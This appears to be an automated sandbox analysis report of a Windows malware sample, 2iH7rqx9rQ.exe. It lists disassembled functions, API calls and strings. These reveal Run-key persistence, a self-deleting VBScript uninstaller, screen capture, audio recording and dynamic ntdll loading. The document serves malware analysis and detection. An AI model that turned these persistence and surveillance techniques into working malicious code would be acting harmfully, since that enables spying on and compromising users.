Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00475B70,00473D54,?,00000000,00411F7E,00465324,00465324,00465324,00401703), ref: 0041B633

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382

Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809

PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B

Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1

Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE

Strings

T@, xrefs: 00411361
exepath, xrefs: 00411308
.exe, xrefs: 0041142F
0DG, xrefs: 004112C3
@CG, xrefs: 004112E2
open, xrefs: 0041147D
WDH, xrefs: 00411389, 004114F8
temp_, xrefs: 0041141D

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
API String ID: 4250697656-2665858469
Opcode ID: 75dfb8f338278d7cbc58dc33158c171c586d5624a4441953bf6902467a8f1367
Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
Opcode Fuzzy Hash: 75dfb8f338278d7cbc58dc33158c171c586d5624a4441953bf6902467a8f1367
Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D

Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7

Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3

Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE

ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
ExitProcess.KERNEL32 ref: 0040C63E

Strings

On Error Resume Next, xrefs: 0040C427
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040C2DF
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040C5E1
\update.vbs, xrefs: 0040C3E9
while fso.FileExists(", xrefs: 0040C45A
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040C330
Temp, xrefs: 0040C3EE
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040C418
exepath, xrefs: 0040C365
fso.DeleteFile ", xrefs: 0040C4A8
""", 0, xrefs: 0040C555
"), xrefs: 0040C443
`=G, xrefs: 0040C2C9
open, xrefs: 0040C62C
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040C56F
wend, xrefs: 0040C4F7
fso.DeleteFolder ", xrefs: 0040C519
@CG, xrefs: 0040C33D

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-3168347843
Opcode ID: 62c6f35a4e8f56280e11f9e2b3593fd0dc7ccf14e6d7d814c3869092d4ae418e
Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
Opcode Fuzzy Hash: 62c6f35a4e8f56280e11f9e2b3593fd0dc7ccf14e6d7d814c3869092d4ae418e
Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E

Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065

Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3

Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00475B70,00000001,?), ref: 0041AB5F

ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
ExitProcess.KERNEL32 ref: 0040C287

Strings

On Error Resume Next, xrefs: 0040C102
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040BF55
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040C22F
@CG, xrefs: 0040BFCC
while fso.FileExists(", xrefs: 0040C136
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040BFA6
.vbs, xrefs: 0040C06F
Temp, xrefs: 0040C0B4
`=G, xrefs: 0040BF3F
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040C0F3
exepath, xrefs: 0040BFEF
pth_unenc, xrefs: 0040BF0A
fso.DeleteFile ", xrefs: 0040C183
"), xrefs: 0040C11F
open, xrefs: 0040C27A
wend, xrefs: 0040C1D2
fso.DeleteFolder ", xrefs: 0040C1F8

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
API String ID: 3797177996-1998216422
Opcode ID: 21dc1c2389bed6f603bf2ab1eac92c79b2af62ea462e9e03a567f189c13acdcf
Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
Opcode Fuzzy Hash: 21dc1c2389bed6f603bf2ab1eac92c79b2af62ea462e9e03a567f189c13acdcf
Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E

Function 0041A1BB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
SetEvent.KERNEL32 ref: 0041A38A
WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
CloseHandle.KERNEL32 ref: 0041A3AB
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7

Strings

resume audio, xrefs: 0041A353
stopped, xrefs: 0041A373
>G, xrefs: 0041A27F, 0041A1FF
" type , xrefs: 0041A24B
status audio mode, xrefs: 0041A368
play audio, xrefs: 0041A2C1
alias audio, xrefs: 0041A22E
pause audio, xrefs: 0041A33B
open ", xrefs: 0041A246
stop audio, xrefs: 0041A3C8
close audio, xrefs: 0041A3D2

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
API String ID: 738084811-1408154895
Opcode ID: 91013a63ee4e34eb08e3e3f7f0f32d6133e65e044e21199f0fa12f81dac0fae0
Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
Opcode Fuzzy Hash: 91013a63ee4e34eb08e3e3f7f0f32d6133e65e044e21199f0fa12f81dac0fae0
Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF

Function 0248151C Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 189synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 0248153B
ExitProcess.KERNEL32 ref: 02481784

Part of subcall function 024828C4: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 024828E0
Part of subcall function 024828C4: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 024828F9
Part of subcall function 024828C4: RegCloseKey.ADVAPI32(?), ref: 02482904

Part of subcall function 0248B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,02473D5A,00465324), ref: 0248B89A

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 024815C2
OpenProcess.KERNEL32(00100000,00000000,0247E3BB,?,?,?,?,00000000), ref: 024815D1
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 024815DC
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 024815E3
GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 024815E9

Part of subcall function 02482A3C: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 02482A4A
Part of subcall function 02482A3C: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0247BBB3,004660E0,00000001,000000AF,00465554), ref: 02482A65
Part of subcall function 02482A3C: RegCloseKey.ADVAPI32(?,?,?,?,0247BBB3,004660E0,00000001,000000AF,00465554), ref: 02482A70

PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 0248161A
GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 02481676
GetTempFileNameW.KERNEL32(?,0046B7CC,00000000,?,?,?,?,?,?,?,?,00000000), ref: 02481690
lstrcatW.KERNEL32(?,0046B7D8,?,?,?,?,?,?,?,00000000), ref: 024816A2

Part of subcall function 0248B7F6: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000000,0248B90C,00000000,00000000,?,?,0247A270), ref: 0248B852
Part of subcall function 0248B7F6: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,0248B90C,00000000,00000000,?,?,0247A270), ref: 0248B866
Part of subcall function 0248B7F6: CloseHandle.KERNEL32(00000000,?,00000000,0248B90C,00000000,00000000,?,?,0247A270), ref: 0248B873

Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 0248172B
OpenProcess.KERNEL32(00100000,00000000,0247E3BB,?,?,?,?,00000000), ref: 02481740
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 0248174B
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 02481752
GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 02481758

Part of subcall function 0248B7F6: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0248B90C,00000000,00000000,?), ref: 0248B835

Strings

exepath, xrefs: 0248156F
WDH, xrefs: 024815F0, 0248175F
0DG, xrefs: 0248152A
@CG, xrefs: 02481549

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExistsExitMutexNamePointerQuerySleepWritelstrcat
String ID: 0DG$@CG$WDH$exepath
API String ID: 1212092484-1464086911
Opcode ID: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
Instruction ID: 966096c20ae1a40ae47141350a3c1c8df6867169d5a2128d45abb965ecca3d2b
Opcode Fuzzy Hash: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
Instruction Fuzzy Hash: D551B271A043056BDB10F7A0AC48EEF336EAB04751F10416BFD19A7291EFB58E428E68

Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42

Strings

RIFF, xrefs: 00401C78
data, xrefs: 00401D2C
fmt , xrefs: 00401CA8
WAVE, xrefs: 00401C98

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3

Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\2iH7rqx9rQ.exe,00000001,004068B2,C:\Users\user\Desktop\2iH7rqx9rQ.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
GetProcAddress.KERNEL32(00000000), ref: 004064FD
GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
GetProcAddress.KERNEL32(00000000), ref: 00406511
GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
GetProcAddress.KERNEL32(00000000), ref: 00406525
GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
GetProcAddress.KERNEL32(00000000), ref: 00406539
GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
GetProcAddress.KERNEL32(00000000), ref: 0040654D
GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
GetProcAddress.KERNEL32(00000000), ref: 00406561

Strings

ntdll.dll, xrefs: 004064E8, 004064F3, 0040650D, 00406521, 00406535, 00406549, 0040655D
NtFreeVirtualMemory, xrefs: 0040651C
RtlInitUnicodeString, xrefs: 004064EE
RtlReleasePebLock, xrefs: 00406544
NtAllocateVirtualMemory, xrefs: 00406508
LdrEnumerateLoadedModules, xrefs: 00406558
RtlAcquirePebLock, xrefs: 00406530
C:\Users\user\Desktop\2iH7rqx9rQ.exe, xrefs: 004064E1

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Users\user\Desktop\2iH7rqx9rQ.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
API String ID: 1646373207-3101228371
Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D

Function 02488206 Relevance: 31.8, APIs: 21, Instructions: 324windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(0046BAC8,00000000,00000000,00000000), ref: 02488220
CreateCompatibleDC.GDI32(00000000), ref: 0248822B

Part of subcall function 024886B9: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 024886E9

CreateCompatibleBitmap.GDI32(?,00000000), ref: 024882AC
SelectObject.GDI32(00000000,00000000), ref: 024882D2
StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 024882FA
GetCursorInfo.USER32(?), ref: 0248831C
GetIconInfo.USER32(?,?), ref: 02488332
DeleteObject.GDI32(?), ref: 02488361
DeleteObject.GDI32(?), ref: 0248836E
DrawIcon.USER32(00000000,?,?,?), ref: 0248837B
BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00471DE4,00000000,00000000,00660046), ref: 024883AB
GetObjectA.GDI32(?,00000018,?), ref: 024883DA
LocalAlloc.KERNEL32(00000040,00000028), ref: 02488423
LocalAlloc.KERNEL32(00000040,00000001), ref: 02488446
GlobalAlloc.KERNEL32(00000000,?), ref: 024884AF
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 024884D2
DeleteObject.GDI32(00000000), ref: 024884EC
GlobalFree.KERNEL32(00CC0020), ref: 024884F7
DeleteObject.GDI32(00000000), ref: 024885AB
GlobalFree.KERNEL32(?), ref: 024885B2
DeleteObject.GDI32(?), ref: 02488608

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Object$Delete$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
String ID:
API String ID: 615876539-0
Opcode ID: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
Instruction ID: 9971818a77b903abe516804f01b1085666d02db96fa4e89e77dd71e13ab2e51b
Opcode Fuzzy Hash: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
Instruction Fuzzy Hash: F9C15971508344AFD320AF25DC44B6FBBE9EF84741F44482EF989972A1EB70E944CB56

Function 0041B1BB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0041B1D6
_memcmp.LIBVCRUNTIME ref: 0041B1EE
lstrlenW.KERNEL32(?), ref: 0041B207
FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
_wcslen.LIBCMT ref: 0041B2DB
FindVolumeClose.KERNEL32(?), ref: 0041B2FB
GetLastError.KERNEL32 ref: 0041B313
GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
lstrcatW.KERNEL32(?,?), ref: 0041B359
lstrcpyW.KERNEL32(?,?), ref: 0041B368
GetLastError.KERNEL32 ref: 0041B370

Strings

?, xrefs: 0041B26D

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
String ID: ?
API String ID: 3941738427-1684325040
Opcode ID: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
Opcode Fuzzy Hash: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6

Function 0248B422 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0248B43D
_memcmp.LIBVCRUNTIME ref: 0248B455
lstrlenW.KERNEL32(?), ref: 0248B46E
FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0248B4A9
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0248B4BC
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0248B500
lstrcmpW.KERNEL32(?,?), ref: 0248B51B
FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0248B533
_wcslen.LIBCMT ref: 0248B542
FindVolumeClose.KERNEL32(?), ref: 0248B562
GetLastError.KERNEL32 ref: 0248B57A
GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0248B5A7
lstrcatW.KERNEL32(?,?), ref: 0248B5C0
lstrcpyW.KERNEL32(?,?), ref: 0248B5CF
GetLastError.KERNEL32 ref: 0248B5D7

Strings

?, xrefs: 0248B4D4

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
String ID: ?
API String ID: 3941738427-1684325040
Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
Instruction ID: 3610d2b838d38f9fc3dd3e01a29d762c05c43c11f7ce214c8b7dd849f480e906
Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
Instruction Fuzzy Hash: 58415E71518305AFD720EFA4E849AAFB7E8EB54719F00493BF545C2261EB74C648CB92

